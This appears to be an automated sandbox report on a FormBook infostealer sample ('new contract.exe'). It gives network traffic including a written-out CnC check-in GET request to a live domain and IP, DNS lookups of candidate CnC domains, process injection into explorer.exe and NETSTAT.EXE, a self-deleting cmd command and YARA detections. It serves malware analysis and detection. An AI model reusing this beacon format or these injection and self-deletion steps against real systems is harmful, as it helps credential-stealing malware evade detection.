.text | 0x2000 | 0x91600 | 0x91600 | 90a675e29cf0abadb37d1deb49041f21 | False | 0.9244763676913156 | data | 7.83819492389617 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x94000 | 0x13a0 | 0x1400 | 365d9ab0b3dc0321aa7fb04213806ffe | False | 0.778125 | data | 7.0256123925831035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x96000 | 0xc | 0x200 | c5a692969a170b74d97ee91727e67cf3 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x940c8 | 0xf91 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8936010037641154
RT_GROUP_ICON | 0x9506c | 0x14 | data | | | 1.05
RT_VERSION | 0x95090 | 0x30c | data | | | 0.43205128205128207
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-10T21:06:44.004230+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49979 | 89.31.143.90 | 80 | TCP
2024-10-10T21:06:44.004230+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49979 | 89.31.143.90 | 80 | TCP
2024-10-10T21:06:44.004230+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49979 | 89.31.143.90 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 10, 2024 21:06:42.471518040 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:42.476526976 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
Oct 10, 2024 21:06:42.476742029 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:42.476766109 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:42.481987953 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
Oct 10, 2024 21:06:42.990436077 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:43.349745989 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:43.996750116 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:44.004156113 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
Oct 10, 2024 21:06:44.004168034 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
Oct 10, 2024 21:06:44.004199028 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
Oct 10, 2024 21:06:44.004211903 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:44.004230022 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:44.004251957 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:44.004348993 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
Oct 10, 2024 21:06:44.004390001 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:44.004874945 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
Oct 10, 2024 21:06:44.004909992 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:44.006369114 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
Oct 10, 2024 21:06:44.006383896 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
Oct 10, 2024 21:06:44.006413937 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:44.006432056 CEST | 49979 | 80 | 192.168.2.4 | 89.31.143.90
Oct 10, 2024 21:06:44.007328987 CEST | 80 | 49979 | 89.31.143.90 | 192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:44.007386923 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Oct 10, 2024 21:05:41.991652012 CEST5424753192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:05:42.008086920 CEST53542471.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:01.756526947 CEST5014253192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:06:01.774740934 CEST53501421.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:22.303647041 CEST4963653192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:06:22.322021961 CEST53496361.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:42.447335958 CEST6303153192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:06:42.465980053 CEST53630311.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:07:03.708362103 CEST5347353192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:07:03.720439911 CEST53534731.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:07:24.403346062 CEST5674053192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:07:24.414304018 CEST53567401.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:07:44.887103081 CEST6113153192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:07:44.975795984 CEST53611311.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:08:05.294194937 CEST5894553192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:08:05.326864004 CEST53589451.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:08:46.133080959 CEST5033953192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:08:46.164599895 CEST53503391.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:09:08.146991014 CEST5961053192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:09:08.158818960 CEST53596101.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:09:28.303445101 CEST6417053192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:09:28.411026001 CEST53641701.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 10, 2024 21:05:41.991652012 CEST | 192.168.2.4 | 1.1.1.1 | 0x721d | Standard query (0) | www.livialiving.online | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:06:01.756526947 CEST | 192.168.2.4 | 1.1.1.1 | 0x90b2 | Standard query (0) | www.innivip.bio | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:06:22.303647041 CEST | 192.168.2.4 | 1.1.1.1 | 0xdc3d | Standard query (0) | www.aser-cap-hair-growth.today | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:06:42.447335958 CEST | 192.168.2.4 | 1.1.1.1 | 0xaac1 | Standard query (0) | www.igmoto.info | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:07:03.708362103 CEST | 192.168.2.4 | 1.1.1.1 | 0x9fa7 | Standard query (0) | www.olar-systems-panels-61747.bond | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:07:24.403346062 CEST | 192.168.2.4 | 1.1.1.1 | 0xaa83 | Standard query (0) | www.arklife.shop | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:07:44.887103081 CEST | 192.168.2.4 | 1.1.1.1 | 0xc54b | Standard query (0) | www.sofaerb.shop | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:08:05.294194937 CEST | 192.168.2.4 | 1.1.1.1 | 0xa781 | Standard query (0) | www.uickautoquote.net | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:08:46.133080959 CEST | 192.168.2.4 | 1.1.1.1 | 0x80f9 | Standard query (0) | www.ldkp.net | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:09:08.146991014 CEST | 192.168.2.4 | 1.1.1.1 | 0x5a3d | Standard query (0) | www.r64mh1.vip | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:09:28.303445101 CEST | 192.168.2.4 | 1.1.1.1 | 0xc1fe | Standard query (0) | www.aycare-service-99683.bond | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 10, 2024 21:05:42.008086920 CEST | 1.1.1.1 | 192.168.2.4 | 0x721d | Name error (3) | www.livialiving.online | none | none | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:06:01.774740934 CEST | 1.1.1.1 | 192.168.2.4 | 0x90b2 | Name error (3) | www.innivip.bio | none | none | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:06:22.322021961 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc3d | Name error (3) | www.aser-cap-hair-growth.today | none | none | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:06:42.465980053 CEST | 1.1.1.1 | 192.168.2.4 | 0xaac1 | No error (0) | www.igmoto.info | | 89.31.143.90 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:07:03.720439911 CEST | 1.1.1.1 | 192.168.2.4 | 0x9fa7 | Name error (3) | www.olar-systems-panels-61747.bond | none | none | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:07:24.414304018 CEST | 1.1.1.1 | 192.168.2.4 | 0xaa83 | Name error (3) | www.arklife.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:07:44.975795984 CEST | 1.1.1.1 | 192.168.2.4 | 0xc54b | Name error (3) | www.sofaerb.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:08:05.326864004 CEST | 1.1.1.1 | 192.168.2.4 | 0xa781 | Name error (3) | www.uickautoquote.net | none | none | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:08:46.164599895 CEST | 1.1.1.1 | 192.168.2.4 | 0x80f9 | Name error (3) | www.ldkp.net | none | none | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:09:08.158818960 CEST | 1.1.1.1 | 192.168.2.4 | 0x5a3d | Name error (3) | www.r64mh1.vip | none | none | A (IP address) | IN (0x0001) | false
Oct 10, 2024 21:09:28.411026001 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1fe | Name error (3) | www.aycare-service-99683.bond | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                          • www.igmoto.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49979 | 89.31.143.90 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 21:06:42.476766109 CEST | 174 | OUT | GET /c89p/?ohUpTpT0=uK/A8O6Hj9VReqQKS0ATE3Xrf7RWVy6yiEUunzdvsHMfMNs/vPJv/pK5tSC7SJ1XhvpN&BZL00t=YrClV4dXu8Ftc4cp HTTP/1.1
                                                                                                                                                                          Host: www.igmoto.info
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
Oct 10, 2024 21:06:44.004156113 CEST | 450 | IN | HTTP/1.1 200 OK
                                                                                                                                                                          Date: Thu, 10 Oct 2024 19:06:43 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Connection: close
                                                                                                                                                                          content-length: 265
                                                                                                                                                                          Server: UD Webspace 3.2
                                                                                                                                                                          Allow: GET, POST, HEAD
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 73 63 72 6f 6c 6c 69 6e 67 3d 22 4e 4f 22 6e 6f 72 65 73 69 7a 65 3d 22 6e 6f 72 65 73 69 7a 65 22 3e 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 67 6d 6f 74 6f 2e 63 6f 6d 2f 22 3e 3c 6e 6f 66 72 61 6d 65 73 3e 20 2d 20 20 2d 20 69 67 6d 6f 74 6f 2e 69 6e 66 6f 3c 2f 6e 6f 66 72 61 6d 65 73 3e 3c 2f 66 72 61 6d 65 73 65 74 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <html><title></title><meta name="keywords"content=""><meta name="description"content=""><frameset framespacing="0"frameborder="0"rows="100%,*"scrolling="NO"noresize="noresize"><frame src="https://igmoto.com/"><noframes> - - igmoto.info</noframes></frameset></html>

Target ID: 0
Start time: 15:04:58
Start date: 10/10/2024
Path: C:\Users\user\Desktop\new contract.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\new contract.exe"
Imagebase: 0xbe0000
File size: 601'600 bytes
MD5 hash: C6B38036B68EA21306E8814AB1B1B4D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 2
Start time: 15:05:03
Start date: 10/10/2024
Path: C:\Users\user\Desktop\new contract.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\new contract.exe"
Imagebase: 0xad0000
File size: 601'600 bytes
MD5 hash: C6B38036B68EA21306E8814AB1B1B4D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

Target ID:3
Start time:15:05:04
Start date:10/10/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x7ff72b770000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:false

Target ID:4
Start time:15:05:07
Start date:10/10/2024
Path:C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\SysWOW64\autofmt.exe"
Imagebase:0xdf0000
File size:822'272 bytes
MD5 hash:C72D80A976B7EB40534E8464957A979F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:5
Start time:15:05:07
Start date:10/10/2024
Path:C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
Imagebase:0x680000
File size:32'768 bytes
MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:moderate
Has exited:false

Target ID:6
Start time:15:05:11
Start date:10/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del "C:\Users\user\Desktop\new contract.exe"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:15:05:11
Start date:10/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:9.4%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:232
Total number of Limit Nodes:11
execution_graph: interactive graph rendered on the original page. API nodes present in the graph: CreateActCtxA, GetModuleHandleW, CreateIconFromResourceEx, CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, PostMessageW, DuplicateHandle.

Control-flow Graph
                                                                                                                                                                            control_flow_graph 294 77b07b0-77b2ae8 297 77b2fcb-77b3034 294->297 298 77b2aee-77b2af3 294->298 304 77b303b-77b30c3 297->304 298->297 299 77b2af9-77b2b16 298->299 299->304 305 77b2b1c-77b2b20 299->305 349 77b30ce-77b314e 304->349 307 77b2b2f-77b2b33 305->307 308 77b2b22-77b2b2c call 77b07c0 305->308 310 77b2b42-77b2b49 307->310 311 77b2b35-77b2b3f call 77b07c0 307->311 308->307 316 77b2b4f-77b2b7f 310->316 317 77b2c64-77b2c69 310->317 311->310 327 77b334e-77b3374 316->327 330 77b2b85-77b2c58 call 77b07cc * 2 316->330 320 77b2c6b-77b2c6f 317->320 321 77b2c71-77b2c76 317->321 320->321 323 77b2c78-77b2c7c 320->323 324 77b2c88-77b2cb8 call 77b07d8 * 3 321->324 323->327 328 77b2c82-77b2c85 323->328 324->349 350 77b2cbe-77b2cc1 324->350 338 77b3376-77b3382 327->338 339 77b3384 327->339 328->324 330->317 358 77b2c5a 330->358 344 77b3387-77b338c 338->344 339->344 366 77b3155-77b31d7 349->366 350->349 353 77b2cc7-77b2cc9 350->353 353->349 354 77b2ccf-77b2d04 353->354 365 77b2d0a-77b2d13 354->365 354->366 358->317 368 77b2d19-77b2d73 call 77b07d8 * 2 call 77b07e8 * 2 365->368 369 77b2e76-77b2e7a 365->369 371 77b31df-77b3261 366->371 411 77b2d85 368->411 412 77b2d75-77b2d7e 368->412 369->371 372 77b2e80-77b2e84 369->372 376 77b3269-77b3296 371->376 375 77b2e8a-77b2e90 372->375 372->376 380 77b2e92 375->380 381 77b2e94-77b2ec9 375->381 389 77b329d-77b331d 376->389 385 77b2ed0-77b2ed6 380->385 381->385 385->389 390 77b2edc-77b2ee4 385->390 445 77b3324-77b3346 389->445 394 77b2eeb-77b2eed 390->394 395 77b2ee6-77b2eea 390->395 402 77b2f4f-77b2f55 394->402 403 77b2eef-77b2f13 394->403 395->394 406 77b2f57-77b2f72 402->406 407 77b2f74-77b2fa2 402->407 433 77b2f1c-77b2f20 403->433 434 77b2f15-77b2f1a 403->434 426 77b2faa-77b2fb6 406->426 407->426 417 77b2d89-77b2d8b 411->417 412->417 418 77b2d80-77b2d83 412->418 
424 77b2d8d 417->424 425 77b2d92-77b2d96 417->425 418->417 424->425 430 77b2d98-77b2d9f 425->430 431 77b2da4-77b2daa 425->431 444 77b2fbc-77b2fc8 426->444 426->445 440 77b2e41-77b2e45 430->440 441 77b2dac-77b2db2 431->441 442 77b2db4-77b2db9 431->442 433->327 437 77b2f26-77b2f29 433->437 435 77b2f2c-77b2f3d 434->435 454 77b2f45-77b2f4d 435->454 437->435 446 77b2e47-77b2e61 440->446 447 77b2e64-77b2e70 440->447 448 77b2dbf-77b2dc5 441->448 442->448 445->327 446->447 447->368 447->369 451 77b2dcb-77b2dd0 448->451 452 77b2dc7-77b2dc9 448->452 458 77b2dd2-77b2de4 451->458 452->458 454->426 463 77b2dee-77b2df3 458->463 464 77b2de6-77b2dec 458->464 466 77b2df9-77b2e00 463->466 464->466 470 77b2e02-77b2e04 466->470 471 77b2e06 466->471 474 77b2e0b-77b2e16 470->474 471->474 476 77b2e3a 474->476 477 77b2e18-77b2e1b 474->477 476->440 477->440 478 77b2e1d-77b2e23 477->478 479 77b2e2a-77b2e33 478->479 480 77b2e25-77b2e28 478->480 479->440 482 77b2e35-77b2e38 479->482 480->476 480->479 482->440 482->476
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744265645.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: true
• Associated: 00000000.00000002.1744229333.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77a0000_new contract.jbxd
Similarity
• API ID:
• String ID: Hhq$Hhq$Hhq$Hhq$Hhq
• API String ID: 0-1427472961
• Opcode ID: e131e39d1af2b066d29790edb30303ebbc14c30bd3e4eba93ff5e6fe9376b372
• Instruction ID: 7e542466bdfe7128bac1eed36d4b1e8eaebaeee7fb37609e1bf54202935ddcdf
• Opcode Fuzzy Hash: e131e39d1af2b066d29790edb30303ebbc14c30bd3e4eba93ff5e6fe9376b372
• Instruction Fuzzy Hash: 7D3281B0A102188FDB64DFA9C8547AEBBF2BF84340F14856AD109AB395DF349D85CF91

Control-flow Graph
                                                                                                                                                                            control_flow_graph 573 7988348-798836a 574 798871a-798871f 573->574 575 7988370-79883ab call 7987bd8 call 7987be8 call 7987f38 573->575 576 7988729-798872c 574->576 577 7988721-7988723 574->577 587 79883ad-79883b7 575->587 588 79883be-79883de 575->588 580 7988734-798873c 576->580 577->576 582 7988742-7988749 580->582 587->588 590 79883e0-79883ea 588->590 591 79883f1-7988411 588->591 590->591 593 7988413-798841d 591->593 594 7988424-7988444 591->594 593->594 596 7988446-7988450 594->596 597 7988457-7988460 call 7987f48 594->597 596->597 600 7988462-798847d call 7987f48 597->600 601 7988484-798848d call 7987f58 597->601 600->601 606 798848f-79884aa call 7987f58 601->606 607 79884b1-79884ba call 7987f68 601->607 606->607 613 79884bc-79884c0 call 7987f78 607->613 614 79884c5-79884e1 607->614 613->614 618 79884f9-79884fd 614->618 619 79884e3-79884e9 614->619 622 79884ff-7988510 call 7987f88 618->622 623 7988517-798855f 618->623 620 79884eb 619->620 621 79884ed-79884ef 619->621 620->618 621->618 622->623 629 7988561 623->629 630 7988583-798858a 623->630 633 7988564-798856a 629->633 631 798858c-798859b 630->631 632 79885a1-79885af call 7987f98 630->632 631->632 642 79885b9-79885e3 632->642 643 79885b1-79885b3 632->643 635 798874a-7988789 633->635 636 7988570-7988576 633->636 644 79887e8-79887f8 635->644 645 798878b-79887ac 635->645 637 7988578-798857a 636->637 638 7988580-7988581 636->638 637->638 638->630 638->633 655 7988610-798862c 642->655 656 79885e5-79885f3 642->656 643->642 650 79889ce-79889d5 644->650 651 79887fe-7988808 644->651 645->644 649 79887ae-79887b4 645->649 657 79887c2-79887c7 649->657 658 79887b6-79887b8 649->658 659 79889e4-79889f7 650->659 660 79889d7-79889df call 79845bc 650->660 653 798880a-7988811 651->653 654 7988812-798881c 651->654 661 7988a01-7988a94 654->661 662 
7988822-7988862 654->662 671 798862e-7988638 655->671 672 798863f-7988666 call 7987fa8 655->672 656->655 669 79885f5-7988609 656->669 664 79887c9-79887cd 657->664 665 79887d4-79887e1 657->665 658->657 660->659 721 7988aa5-7988aba 661->721 722 7988a96-7988aa2 661->722 690 798887a-798887e 662->690 691 7988864-798886a 662->691 664->665 665->644 669->655 671->672 682 7988668-798866e 672->682 683 798867e-7988682 672->683 684 7988670 682->684 685 7988672-7988674 682->685 687 798869d-79886b9 683->687 688 7988684-7988696 683->688 684->683 685->683 700 79886bb-79886c1 687->700 701 79886d1-79886d5 687->701 688->687 692 79888ab-79888c3 call 79880bc 690->692 693 7988880-79888a5 690->693 697 798886c 691->697 698 798886e-7988870 691->698 714 79888d0-79888d8 692->714 715 79888c5-79888ca 692->715 693->692 697->690 698->690 705 79886c3 700->705 706 79886c5-79886c7 700->706 701->582 707 79886d7-79886e5 701->707 705->701 706->701 712 79886f7-79886fb 707->712 713 79886e7-79886f5 707->713 720 7988701-7988719 712->720 713->712 713->720 716 79888da-79888e8 714->716 717 79888ee-798890d 714->717 715->714 716->717 726 798890f-7988915 717->726 727 7988925-7988929 717->727 730 7988abb 721->730 722->721 731 7988919-798891b 726->731 732 7988917 726->732 733 798892b-7988938 727->733 734 7988982-79889cb 727->734 730->730 731->727 732->727 738 798893a-798896c 733->738 739 798896e-798897b 733->739 734->650 738->739 739->734
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID:
• String ID: I
• API String ID: 0-3707901625
• Opcode ID: 2d8af62de57a5b3ffd6f4d3ea970e86def40f1b3dbe5938d1d33b49fdf1a4766
• Instruction ID: a9d1414db003d62f1f88b6f7b6eeca323b589fbdc48a0cba1eb9f06311d7f26c
